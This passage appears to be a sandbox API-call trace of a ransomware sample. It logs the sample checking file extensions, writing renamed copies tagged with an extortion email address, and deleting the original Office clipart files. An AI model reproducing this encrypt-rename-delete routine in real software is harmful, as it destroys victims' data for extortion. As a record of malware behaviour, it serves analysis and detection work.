Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF") returned 68 [0195.806] lstrlenW (lpString=".zip") returned 4 [0195.807] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0195.807] lstrlenW (lpString=".rar") returned 4 [0195.807] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0195.807] lstrlenW (lpString=".bz2") returned 4 [0195.807] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0195.807] lstrlenW (lpString=".7z") returned 3 [0195.807] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0195.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF") returned 68 [0195.807] lstrlenW (lpString=".dbf") returned 4 [0195.807] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0195.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF") returned 68 [0195.807] lstrlenW (lpString=".1cd") returned 4 [0195.807] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0195.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF") returned 68 [0195.807] lstrlenW (lpString=".jpg") returned 4 [0195.807] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0195.807] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.808] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152590.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0195.808] GetLastError () returned 0x0 [0195.808] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x2ab4, lpOverlapped=0x0) returned 1 [0195.810] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x2ac0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x2ac0, lpOverlapped=0x0) returned 1 [0195.811] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0195.811] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0195.811] SetEndOfFile (hFile=0x388) returned 1 [0195.811] CloseHandle (hObject=0x388) returned 1 [0195.811] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.811] SetEndOfFile (hFile=0x380) returned 1 [0195.812] CloseHandle (hObject=0x380) returned 1 [0195.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0195.813] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152590.wmf")) returned 1 [0195.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF") returned 68 [0195.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF") returned 68 [0195.813] lstrlenW (lpString=".doc") returned 4 [0195.813] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0195.813] lstrlenW (lpString=".docx") returned 5 [0195.813] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0195.814] lstrlenW (lpString=".pdf") returned 4 [0195.814] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0195.814] lstrlenW (lpString=".xls") returned 4 [0195.814] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0195.814] lstrlenW (lpString=".xlsx") returned 5 [0195.814] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0195.814] lstrlenW (lpString=".ppt") returned 4 [0195.814] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0195.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF") returned 68 [0195.814] lstrlenW (lpString=".zip") returned 4 [0195.814] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0195.814] lstrlenW (lpString=".rar") returned 4 [0195.814] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0195.814] lstrlenW (lpString=".bz2") returned 4 [0195.814] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0195.814] lstrlenW (lpString=".7z") returned 3 [0195.814] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0195.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF") returned 68 [0195.814] lstrlenW (lpString=".dbf") returned 4 [0195.814] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0195.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF") returned 68 [0195.814] lstrlenW (lpString=".1cd") returned 4 [0195.814] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0195.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF") returned 68 [0195.814] lstrlenW (lpString=".jpg") returned 4 [0195.814] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0195.815] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.815] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152594.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0195.817] GetLastError () returned 0x0 [0195.817] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x18c4, lpOverlapped=0x0) returned 1 [0195.892] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x18d0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x18d0, lpOverlapped=0x0) returned 1 [0196.319] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.319] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.319] SetEndOfFile (hFile=0x388) returned 1 [0196.454] CloseHandle (hObject=0x388) returned 1 [0196.454] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.454] SetEndOfFile (hFile=0x380) returned 1 [0196.455] CloseHandle (hObject=0x380) returned 1 [0196.455] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.455] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152594.wmf")) returned 1 [0196.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF") returned 68 [0196.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF") returned 68 [0196.456] lstrlenW (lpString=".doc") returned 4 [0196.456] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.456] lstrlenW (lpString=".docx") returned 5 [0196.456] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0196.456] lstrlenW (lpString=".pdf") returned 4 [0196.456] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.456] lstrlenW (lpString=".xls") returned 4 [0196.456] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.456] lstrlenW (lpString=".xlsx") returned 5 [0196.456] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0196.456] lstrlenW (lpString=".ppt") returned 4 [0196.456] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF") returned 68 [0196.456] lstrlenW (lpString=".zip") returned 4 [0196.456] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.456] lstrlenW (lpString=".rar") returned 4 [0196.456] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.456] lstrlenW (lpString=".bz2") returned 4 [0196.456] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.456] lstrlenW (lpString=".7z") returned 3 [0196.456] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF") returned 68 [0196.457] lstrlenW (lpString=".dbf") returned 4 [0196.457] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF") returned 68 [0196.457] lstrlenW (lpString=".1cd") returned 4 [0196.457] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF") returned 68 [0196.457] lstrlenW (lpString=".jpg") returned 4 [0196.457] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.457] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.457] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152690.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0196.458] GetLastError () returned 0x0 [0196.458] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x4f4, lpOverlapped=0x0) returned 1 [0196.460] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x500, lpOverlapped=0x0) returned 1 [0196.461] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.461] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.461] SetEndOfFile (hFile=0x388) returned 1 [0196.461] CloseHandle (hObject=0x388) returned 1 [0196.461] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.461] SetEndOfFile (hFile=0x380) returned 1 [0196.462] CloseHandle (hObject=0x380) returned 1 [0196.462] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.462] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152690.wmf")) returned 1 [0196.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF") returned 68 [0196.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF") returned 68 [0196.463] lstrlenW (lpString=".doc") returned 4 [0196.463] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.463] lstrlenW (lpString=".docx") returned 5 [0196.463] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0196.463] lstrlenW (lpString=".pdf") returned 4 [0196.463] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.463] lstrlenW (lpString=".xls") returned 4 [0196.463] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.463] lstrlenW (lpString=".xlsx") returned 5 [0196.463] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0196.463] lstrlenW (lpString=".ppt") returned 4 [0196.463] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF") returned 68 [0196.463] lstrlenW (lpString=".zip") returned 4 [0196.463] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.463] lstrlenW (lpString=".rar") returned 4 [0196.463] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.463] lstrlenW (lpString=".bz2") returned 4 [0196.463] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.464] lstrlenW (lpString=".7z") returned 3 [0196.464] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF") returned 68 [0196.464] lstrlenW (lpString=".dbf") returned 4 [0196.464] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF") returned 68 [0196.464] lstrlenW (lpString=".1cd") returned 4 [0196.464] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF") returned 68 [0196.464] lstrlenW (lpString=".jpg") returned 4 [0196.464] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.465] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.465] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152694.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0196.466] GetLastError () returned 0x0 [0196.466] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x544, lpOverlapped=0x0) returned 1 [0196.467] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x550, lpOverlapped=0x0) returned 1 [0196.471] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.472] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.472] SetEndOfFile (hFile=0x388) returned 1 [0196.472] CloseHandle (hObject=0x388) returned 1 [0196.472] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.472] SetEndOfFile (hFile=0x380) returned 1 [0196.473] CloseHandle (hObject=0x380) returned 1 [0196.473] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.473] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152694.wmf")) returned 1 [0196.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF") returned 68 [0196.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF") returned 68 [0196.474] lstrlenW (lpString=".doc") returned 4 [0196.474] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.474] lstrlenW (lpString=".docx") returned 5 [0196.474] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0196.474] lstrlenW (lpString=".pdf") returned 4 [0196.474] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.474] lstrlenW (lpString=".xls") returned 4 [0196.474] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.474] lstrlenW (lpString=".xlsx") returned 5 [0196.474] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0196.474] lstrlenW (lpString=".ppt") returned 4 [0196.474] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF") returned 68 [0196.475] lstrlenW (lpString=".zip") returned 4 [0196.475] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.475] lstrlenW (lpString=".rar") returned 4 [0196.475] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.475] lstrlenW (lpString=".bz2") returned 4 [0196.475] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.475] lstrlenW (lpString=".7z") returned 3 [0196.475] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF") returned 68 [0196.475] lstrlenW (lpString=".dbf") returned 4 [0196.475] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF") returned 68 [0196.475] lstrlenW (lpString=".1cd") returned 4 [0196.475] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF") returned 68 [0196.475] lstrlenW (lpString=".jpg") returned 4 [0196.475] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.475] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.475] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152696.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0196.476] GetLastError () returned 0x0 [0196.476] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x1c98, lpOverlapped=0x0) returned 1 [0196.478] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x1ca0, lpOverlapped=0x0) returned 1 [0196.479] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.479] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.479] SetEndOfFile (hFile=0x388) returned 1 [0196.479] CloseHandle (hObject=0x388) returned 1 [0196.479] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.480] SetEndOfFile (hFile=0x380) returned 1 [0196.480] CloseHandle (hObject=0x380) returned 1 [0196.480] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.481] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152696.wmf")) returned 1 [0196.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF") returned 68 [0196.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF") returned 68 [0196.481] lstrlenW (lpString=".doc") returned 4 [0196.481] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.481] lstrlenW (lpString=".docx") returned 5 [0196.482] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0196.482] lstrlenW (lpString=".pdf") returned 4 [0196.482] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.482] lstrlenW (lpString=".xls") returned 4 [0196.482] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.482] lstrlenW (lpString=".xlsx") returned 5 [0196.482] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0196.482] lstrlenW (lpString=".ppt") returned 4 [0196.482] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF") returned 68 [0196.482] lstrlenW (lpString=".zip") returned 4 [0196.482] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.482] lstrlenW (lpString=".rar") returned 4 [0196.482] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.482] lstrlenW (lpString=".bz2") returned 4 [0196.482] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.482] lstrlenW (lpString=".7z") returned 3 [0196.482] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF") returned 68 [0196.482] lstrlenW (lpString=".dbf") returned 4 [0196.482] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF") returned 68 [0196.482] lstrlenW (lpString=".1cd") returned 4 [0196.482] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF") returned 68 [0196.482] lstrlenW (lpString=".jpg") returned 4 [0196.482] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.483] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.483] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152698.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0196.484] 